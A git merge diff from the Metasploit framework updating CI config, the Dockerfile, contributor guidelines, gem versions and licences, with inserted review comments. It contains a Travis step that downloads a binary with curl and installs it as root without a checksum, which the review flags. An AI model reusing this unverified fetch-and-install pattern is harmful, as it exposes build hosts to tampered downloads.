Merge branch 'master' into consul_exec
commit
08541cd7b9
|
@ -5,6 +5,8 @@ docker-compose*.yml
|
|||
docker/
|
||||
!docker/msfconsole.rc
|
||||
!docker/entrypoint.sh
|
||||
!docker/database.yml
|
||||
Dockerfile
|
||||
README.md
|
||||
.git/
|
||||
.github/
|
||||
|
|
|
@ -1 +1 @@
|
|||
2.5.1
|
||||
2.5.3
|
||||
|
|
21
.travis.yml
21
.travis.yml
|
@ -11,9 +11,9 @@ addons:
|
|||
- graphviz
|
||||
language: ruby
|
||||
rvm:
|
||||
- '2.3.7'
|
||||
- '2.4.4'
|
||||
- '2.5.1'
|
||||
- '2.3.8'
|
||||
- '2.4.5'
|
||||
- '2.5.3'
|
||||
|
||||
env:
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
|
@ -24,19 +24,22 @@ env:
|
|||
matrix:
|
||||
fast_finish: true
|
||||
exclude:
|
||||
- rvm: '2.3.7'
|
||||
- rvm: '2.3.8'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
- rvm: '2.4.4'
|
||||
- rvm: '2.4.5'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
|
||||
jobs:
|
||||
# build docker image
|
||||
include:
|
||||
- env: CMD="docker-compose build" DOCKER="true"
|
||||
- env: CMD="/usr/bin/docker-compose build" DOCKER="true"
|
||||
# we do not need any setup
|
||||
before_install: skip
|
||||
install: skip
|
||||
before_script: skip
|
||||
before_script:
|
||||
- curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
|
||||
- chmod +x docker-compose
|
||||
- sudo mv docker-compose /usr/bin
|
||||
before_install:
|
||||
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
||||
- rake --version
|
||||
|
@ -56,7 +59,9 @@ before_script:
|
|||
script:
|
||||
- echo "${CMD}"
|
||||
# we need travis_wait because the Docker build job can take longer than 10 minutes
|
||||
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
|
||||
#- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
|
||||
# docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
|
||||
- bash -c "${CMD}"
|
||||
|
||||
notifications:
|
||||
irc: "irc.freenode.org#msfnotify"
|
||||
|
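Review bot: The docker-compose binary fetched in the new before_script (`curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-...`) is moved into /usr/bin with sudo without any integrity check, so a tampered download or a redirect to the wrong artifact would run as root on the CI host. The version is already pinned, so pin the release's published sha256 next to it and verify before the move, e.g. add `echo "<sha256>  docker-compose" | sha256sum -c -` between the curl and chmod lines. The curl call also lacks `-f`, so an HTTP error body would be saved as the "binary" and only fail later at exec time; `curl -fsSL` turns that into a failure at the download step. Separately, the commented-out `travis_wait 40` line under script is now dead text; keep only the `docker_wait is currently broken` comment or delete both.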
|
|
@ -37,7 +37,7 @@ when an individual is representing the project or its community.
|
|||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported by contacting the project maintainers at msfdev@metasploit.com. If
|
||||
the incident involves a committer, you may report directly to
|
||||
egypt@metasploit.com or todb@metasploit.com.
|
||||
caitlin_condon@rapid7.com or todb@metasploit.com.
|
||||
|
||||
All complaints will be reviewed and investigated and will result in a
|
||||
response that is deemed necessary and appropriate to the circumstances.
|
||||
|
|
114
CONTRIBUTING.md
114
CONTRIBUTING.md
|
@ -1,82 +1,54 @@
|
|||
# Hello, World!
|
||||
|
||||
Thanks for your interest in making Metasploit -- and therefore, the
|
||||
world -- a better place!
|
||||
|
||||
Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
|
||||
Please try to be as specific as you can about your problem; include steps
|
||||
to reproduce (cut and paste from your console output if it's helpful) and
|
||||
what you were expecting to happen.
|
||||
|
||||
Are you about to report a security vulnerability in Metasploit itself?
|
||||
How ironic! Please take a look at Rapid7's [Vulnerability
|
||||
Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
|
||||
your report to security@rapid7.com using our [PGP key].
|
||||
|
||||
Are you about to contribute some new functionality, a bug fix, or a new
|
||||
Metasploit module? If so, read on...
|
||||
world -- a better place! Before you get started, review our
|
||||
[Code of Conduct]. There are mutliple ways to help beyond just writing code:
|
||||
- [Submit bugs and feature requests] with detailed information about your issue or idea.
|
||||
- [Help fellow users with open issues] or [help fellow committers test recent pull requests].
|
||||
- [Report a security vulnerability in Metasploit itself] to Rapid7.
|
||||
- Submit an updated or brand new module! We are always eager for exploits, scanners, and new
|
||||
integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
|
||||
|
||||
# Contributing to Metasploit
|
||||
|
||||
What you see here in CONTRIBUTING.md is a bullet point list of the do's
|
||||
and don'ts of how to make sure *your* valuable contributions actually
|
||||
make it into Metasploit's master branch.
|
||||
|
||||
If you care not to follow these rules, your contribution **will** be
|
||||
closed. Sorry!
|
||||
|
||||
This is intended to be a **short** list. The [wiki] is much more
|
||||
exhaustive and reveals many mysteries. If you read nothing else, take a
|
||||
look at the standard [development environment setup] guide
|
||||
and Metasploit's [Common Coding Mistakes].
|
||||
Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
|
||||
it into Metasploit's master branch. If you do not care to follow these rules, your contribution
|
||||
**will** be closed. Sorry!
|
||||
|
||||
## Code Contributions
|
||||
|
||||
* **Do** stick to the [Ruby style guide].
|
||||
* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
|
||||
* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
|
||||
* **Do** follow the [50/72 rule] for Git commit messages.
|
||||
* **Don't** use the default merge messages when merging from other branches.
|
||||
* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master`.
|
||||
If you do not send a PR from a topic branch, the history of your PR will be
|
||||
lost as soon as you update your own master branch. See
|
||||
https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
|
||||
this in action.
|
||||
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
|
||||
history of your pull request. See [PR#8000] for an example of losing commit history as soon as
|
||||
you update your own master branch.
|
||||
|
||||
### Pull Requests
|
||||
|
||||
* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
|
||||
* **Do** target your pull request to the **master branch**.
|
||||
* **Do** specify a descriptive title to make searching for your pull request easier.
|
||||
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
|
||||
* **Do** list [verification steps] so your code is testable.
|
||||
* **Do** [reference associated issues] in your pull request description.
|
||||
* **Do** write [release notes] once a pull request is landed.
|
||||
* **Don't** leave your pull request description blank.
|
||||
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
|
||||
|
||||
Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
||||
Pull request [PR#9966] is a good example to follow.
|
||||
|
||||
#### New Modules
|
||||
|
||||
* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
|
||||
- It would be even better to set up `msftidy.rb` as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s.
|
||||
* **Don't** include more than one module per pull request.
|
||||
* **Do** include instructions on how to setup the vulnerable environment or software.
|
||||
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
|
||||
|
||||
|
||||
|
||||
#### Scripts
|
||||
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for
|
||||
automating local tasks, and anything "serious" can be done with post
|
||||
modules and local exploits.
|
||||
* **Do** include [Module Documentation] showing sample run-throughs.
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for automating local tasks, and
|
||||
anything "serious" can be done with post modules and local exploits.
|
||||
|
||||
#### Library Code
|
||||
|
||||
* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
|
||||
* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
|
||||
* **Do** follow [Better Specs] - it's like the style guide for specs.
|
||||
* **Do** write [YARD] documentation - this makes it easier for people to use your code.
|
||||
* **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
|
||||
|
@ -84,44 +56,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
|||
#### Bug Fixes
|
||||
|
||||
* **Do** include reproduction steps in the form of verification steps.
|
||||
* **Do** include a link to any corresponding [Issues] in the format of
|
||||
`See #1234` in your commit description.
|
||||
* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
|
||||
|
||||
## Bug Reports
|
||||
|
||||
* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
|
||||
Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security).
|
||||
|
||||
When reporting Metasploit issues:
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
|
||||
* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
* **Don't** file duplicate reports; search for your bug before filing a new report.
|
||||
|
||||
If you need some more guidance, talk to the main body of open
|
||||
source contributors over on the [Freenode IRC channel],
|
||||
or e-mail us at the [metasploit-hackers] mailing list.
|
||||
If you need some more guidance, talk to the main body of open source contributors over on our
|
||||
[Metasploit Slack] or [#metasploit on Freenode IRC].
|
||||
|
||||
Also, **thank you** for taking the few moments to read this far! You're
|
||||
already way ahead of the curve, so keep it up!
|
||||
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
|
||||
curve, so keep it up!
|
||||
|
||||
[Issue Tracker]:http://r-7.co/MSF-BUGv1
|
||||
[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
|
||||
[wiki]:https://github.com/rapid7/metasploit-framework/wiki
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[development environment setup]:http://r-7.co/MSF-DEV
|
||||
[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
|
||||
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
|
||||
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
|
||||
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
|
||||
[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
|
||||
[development environment]:http://r-7.co/MSF-DEV
|
||||
[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
|
||||
[Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
|
||||
[Rubocop]:https://rubygems.org/search?query=rubocop
|
||||
[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
|
||||
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
|
||||
[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
|
||||
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
|
||||
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
|
||||
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
|
||||
[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
|
||||
[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
|
||||
[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
|
||||
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
|
||||
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
|
||||
[API]:https://rapid7.github.io/metasploit-framework/api
|
||||
[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[RSpec]:http://rspec.info
|
||||
[Better Specs]:http://betterspecs.org
|
||||
[YARD]:http://yardoc.org
|
||||
[Issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
|
||||
[Metasploit Slack]:https://www.metasploit.com/slack
|
||||
[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
|
|
54
Dockerfile
54
Dockerfile
|
@ -1,31 +1,17 @@
|
|||
FROM ruby:2.5.1-alpine3.7
|
||||
FROM ruby:2.5.3-alpine3.7 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV NMAP_PRIVILEGED=""
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV BUNDLE_IGNORE_MESSAGES="true"
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
|
||||
COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
|
||||
COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
|
||||
COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
|
||||
|
||||
RUN apk update && \
|
||||
apk add \
|
||||
bash \
|
||||
sqlite-libs \
|
||||
nmap \
|
||||
nmap-scripts \
|
||||
nmap-nselibs \
|
||||
postgresql-libs \
|
||||
python \
|
||||
python3 \
|
||||
ncurses \
|
||||
libcap \
|
||||
su-exec \
|
||||
&& apk add --virtual .ruby-builddeps \
|
||||
RUN apk add --no-cache \
|
||||
autoconf \
|
||||
bison \
|
||||
build-base \
|
||||
|
@ -44,20 +30,38 @@ RUN apk update && \
|
|||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||
&& gem update --system \
|
||||
&& gem install bundler \
|
||||
&& bundle install --system $BUNDLER_ARGS \
|
||||
&& apk del .ruby-builddeps \
|
||||
&& rm -rf /var/cache/apk/*
|
||||
&& bundle install --clean --no-cache --system $BUNDLER_ARGS \
|
||||
# temp fix for https://github.com/bundler/bundler/issues/6680
|
||||
&& rm -rf /usr/local/bundle/cache \
|
||||
# needed so non root users can read content of the bundle
|
||||
&& chmod -R a+r /usr/local/bundle
|
||||
|
||||
|
||||
FROM ruby:2.5.3-alpine3.7
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV NMAP_PRIVILEGED=""
|
||||
ENV METASPLOIT_GROUP=metasploit
|
||||
|
||||
# used for the copy command
|
||||
RUN addgroup -S $METASPLOIT_GROUP
|
||||
|
||||
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
|
||||
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
|
||||
|
||||
ADD ./ $APP_HOME
|
||||
COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
|
||||
COPY --chown=root:metasploit . $APP_HOME/
|
||||
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
|
||||
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
# we need this entrypoint to dynamically create a user
|
||||
# matching the hosts UID and GID so we can mount something
|
||||
# from the users home directory. If the IDs don't match
|
||||
# it results in access denied errors. Once docker has
|
||||
# a solution for this we can revert it back to normal
|
||||
# it results in access denied errors.
|
||||
ENTRYPOINT ["docker/entrypoint.sh"]
|
||||
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
|
||||
|
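Review bot: The new CMD is in JSON exec form, so `$APP_HOME` in `"-y", "$APP_HOME/config/database.yml"` is never expanded by a shell; msfconsole receives the literal string unless docker/entrypoint.sh (not shown here) re-evaluates its arguments, which a plain `exec "$@"` would not. Since WORKDIR is already $APP_HOME, the portable fix is a relative path: `CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "config/database.yml"]`. The unchanged `setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)` line grants raw-socket and privileged-port capabilities to every Ruby process in the final image, not only msfconsole; if that is intentional for the non-root user the entrypoint creates, a comment stating so (and why `+eip` rather than `+ep`) would help the next reviewer. Both stages are pinned by tag only (`ruby:2.5.3-alpine3.7`); pinning by digest would make the multi-stage build reproducible.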
|
112
Gemfile.lock
112
Gemfile.lock
|
@ -9,7 +9,10 @@ PATH
|
|||
bcrypt
|
||||
bcrypt_pbkdf
|
||||
bit-struct
|
||||
concurrent-ruby (= 1.0.5)
|
||||
dnsruby
|
||||
ed25519
|
||||
em-http-request
|
||||
faker
|
||||
filesize
|
||||
jsobfu
|
||||
|
@ -18,9 +21,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.40)
|
||||
metasploit-payloads (= 1.3.56)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.4.1)
|
||||
metasploit_payloads-mettle (= 0.5.0)
|
||||
mqtt
|
||||
msgpack
|
||||
nessus_rest
|
||||
|
@ -78,27 +81,27 @@ GEM
|
|||
remote: https://rubygems.org/
|
||||
specs:
|
||||
Ascii85 (1.0.3)
|
||||
actionpack (4.2.10)
|
||||
actionview (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionpack (4.2.11)
|
||||
actionview (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rack (~> 1.6)
|
||||
rack-test (~> 0.6.2)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
actionview (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionview (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
erubis (~> 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
||||
activemodel (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activemodel (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
activerecord (4.2.10)
|
||||
activemodel (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activerecord (4.2.11)
|
||||
activemodel (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
arel (~> 6.0)
|
||||
activesupport (4.2.10)
|
||||
activesupport (4.2.11)
|
||||
i18n (~> 0.7)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
|
@ -107,42 +110,53 @@ GEM
|
|||
public_suffix (>= 2.0.2, < 4.0)
|
||||
afm (0.2.2)
|
||||
arel (6.0.4)
|
||||
arel-helpers (2.7.0)
|
||||
arel-helpers (2.8.0)
|
||||
activerecord (>= 3.1.0, < 6)
|
||||
backports (3.11.3)
|
||||
backports (3.11.4)
|
||||
bcrypt (3.1.12)
|
||||
bcrypt_pbkdf (1.0.0)
|
||||
bindata (2.4.3)
|
||||
bindata (2.4.4)
|
||||
bit-struct (0.16)
|
||||
builder (3.2.3)
|
||||
coderay (1.1.2)
|
||||
concurrent-ruby (1.0.5)
|
||||
cookiejar (0.3.3)
|
||||
crass (1.0.4)
|
||||
daemons (1.2.6)
|
||||
daemons (1.3.0)
|
||||
diff-lcs (1.3)
|
||||
dnsruby (1.61.2)
|
||||
addressable (~> 2.5)
|
||||
docile (1.3.1)
|
||||
ed25519 (1.2.4)
|
||||
em-http-request (1.1.5)
|
||||
addressable (>= 2.3.4)
|
||||
cookiejar (!= 0.3.1)
|
||||
em-socksify (>= 0.3)
|
||||
eventmachine (>= 1.0.3)
|
||||
http_parser.rb (>= 0.6.0)
|
||||
em-socksify (0.3.2)
|
||||
eventmachine (>= 1.0.0.beta.4)
|
||||
erubis (2.7.0)
|
||||
eventmachine (1.2.7)
|
||||
factory_bot (4.10.0)
|
||||
factory_bot (4.11.1)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_bot_rails (4.10.0)
|
||||
factory_bot (~> 4.10.0)
|
||||
factory_bot_rails (4.11.1)
|
||||
factory_bot (~> 4.11.1)
|
||||
railties (>= 3.0.0)
|
||||
faker (1.9.1)
|
||||
i18n (>= 0.7)
|
||||
faraday (0.15.2)
|
||||
faraday (0.15.4)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
filesize (0.1.1)
|
||||
filesize (0.2.0)
|
||||
fivemat (1.3.7)
|
||||
hashery (2.1.2)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jsobfu (0.4.2)
|
||||
rkelly-remix
|
||||
json (2.1.0)
|
||||
loofah (2.2.2)
|
||||
loofah (2.2.3)
|
||||
crass (~> 1.0.2)
|
||||
nokogiri (>= 1.5.9)
|
||||
metasm (1.0.3)
|
||||
|
@ -150,7 +164,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (3.0.1)
|
||||
metasploit-credential (3.0.2)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models (>= 3.0.0)
|
||||
|
@ -164,8 +178,8 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.40)
|
||||
metasploit_data_models (3.0.0)
|
||||
metasploit-payloads (1.3.56)
|
||||
metasploit_data_models (3.0.2)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
|
@ -175,8 +189,8 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.4.1)
|
||||
method_source (0.9.0)
|
||||
metasploit_payloads-mettle (0.5.0)
|
||||
method_source (0.9.2)
|
||||
mini_portile2 (2.3.0)
|
||||
minitest (5.11.3)
|
||||
mqtt (0.5.0)
|
||||
|
@ -186,9 +200,9 @@ GEM
|
|||
net-ssh (5.0.2)
|
||||
network_interface (0.0.2)
|
||||
nexpose (7.2.1)
|
||||
nokogiri (1.8.4)
|
||||
nokogiri (1.8.5)
|
||||
mini_portile2 (~> 2.3.0)
|
||||
octokit (4.9.0)
|
||||
octokit (4.13.0)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
openvas-omp (0.0.4)
|
||||
|
@ -208,11 +222,11 @@ GEM
|
|||
activerecord (~> 4.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.11.3)
|
||||
pry (0.12.2)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.9.0)
|
||||
public_suffix (3.0.2)
|
||||
rack (1.6.10)
|
||||
public_suffix (3.0.3)
|
||||
rack (1.6.11)
|
||||
rack-protection (1.5.5)
|
||||
rack
|
||||
rack-test (0.6.3)
|
||||
|
@ -225,19 +239,19 @@ GEM
|
|||
rails-deprecated_sanitizer (>= 1.0.1)
|
||||
rails-html-sanitizer (1.0.4)
|
||||
loofah (~> 2.2, >= 2.2.2)
|
||||
railties (4.2.10)
|
||||
actionpack (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
railties (4.2.11)
|
||||
actionpack (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.3.1)
|
||||
rake (12.3.2)
|
||||
rb-readline (0.5.5)
|
||||
recog (2.1.20)
|
||||
recog (2.1.36)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.13)
|
||||
rex-text
|
||||
rex-bin_tools (0.1.4)
|
||||
rex-bin_tools (0.1.6)
|
||||
metasm
|
||||
rex-arch
|
||||
rex-core
|
||||
|
@ -288,13 +302,13 @@ GEM
|
|||
rspec-mocks (~> 3.8.0)
|
||||
rspec-core (3.8.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-expectations (3.8.1)
|
||||
rspec-expectations (3.8.2)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-mocks (3.8.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-rails (3.8.0)
|
||||
rspec-rails (3.8.1)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
|
@ -305,14 +319,14 @@ GEM
|
|||
rspec-rerun (1.1.0)
|
||||
rspec (~> 3.0)
|
||||
rspec-support (3.8.0)
|
||||
ruby-macho (2.0.0)
|
||||
ruby-macho (2.1.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby_smb (1.0.3)
|
||||
ruby_smb (1.0.5)
|
||||
bindata
|
||||
rubyntlm
|
||||
windows_error
|
||||
rubyntlm (0.6.2)
|
||||
rubyzip (1.2.1)
|
||||
rubyzip (1.2.2)
|
||||
sawyer (0.8.1)
|
||||
addressable (>= 2.3.5, < 2.6)
|
||||
faraday (~> 0.8, < 1.0)
|
||||
|
@ -333,14 +347,14 @@ GEM
|
|||
daemons (~> 1.0, >= 1.0.9)
|
||||
eventmachine (~> 1.0, >= 1.0.4)
|
||||
rack (>= 1, < 3)
|
||||
thor (0.20.0)
|
||||
thor (0.20.3)
|
||||
thread_safe (0.3.6)
|
||||
tilt (2.0.8)
|
||||
tilt (2.0.9)
|
||||
timecop (0.9.1)
|
||||
ttfunk (1.5.1)
|
||||
tzinfo (1.2.5)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2018.5)
|
||||
tzinfo-data (1.2018.7)
|
||||
tzinfo (>= 1.0.0)
|
||||
warden (1.2.7)
|
||||
rack (>= 1.0)
|
||||
|
@ -349,7 +363,7 @@ GEM
|
|||
activemodel (>= 4.2.7)
|
||||
activesupport (>= 4.2.7)
|
||||
xmlrpc (0.3.0)
|
||||
yard (0.9.15)
|
||||
yard (0.9.16)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
@ -370,4 +384,4 @@ DEPENDENCIES
|
|||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.3
|
||||
1.16.6
|
||||
|
|
6
LICENSE
6
LICENSE
|
@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
|
|||
Copyright: 2009 Vertive, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
|
||||
Copyright: 2006-2010 Yoann GUILLOT
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: lib/msf/core/modules/external/python/async_timeout/*
|
||||
Copyright: 2016-2017 Andrew Svetlov
|
||||
License: Apache 2.0
|
||||
|
@ -115,7 +111,7 @@ Files: data/webcam/api.js
|
|||
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
|
||||
License: MIT
|
||||
|
||||
Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
|
||||
Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
|
||||
Copyright: Copyright 2018 SmartBear Software
|
||||
License: Apache 2.0
|
||||
|
||||
|
|
|
@ -1,11 +0,0 @@
|
|||
#!/bin/sh
|
||||
|
||||
gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
|
||||
strip cpuinfo.ia32.bin && \
|
||||
gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
|
||||
strip cpuinfo.ia64.bin && \
|
||||
i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
|
||||
strip cpuinfo.exe
|
||||
|
||||
ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
|
||||
|
|
@ -1,64 +0,0 @@
|
|||
// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
|
||||
|
||||
/*
|
||||
#!/usr/bin/env ruby
|
||||
# This file is part of Metasm, the Ruby assembly manipulation suite
|
||||
# Copyright (C) 2006-2009 Yoann GUILLOT
|
||||
#
|
||||
# Licence is LGPL, see LICENCE in the top-level directory
|
||||
|
||||
|
||||
#
|
||||
# this sample shows the compilation of a slightly more complex program
|
||||
# it displays in a messagebox the result of CPUID
|
||||
#
|
||||
|
||||
*/
|
||||
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
|
||||
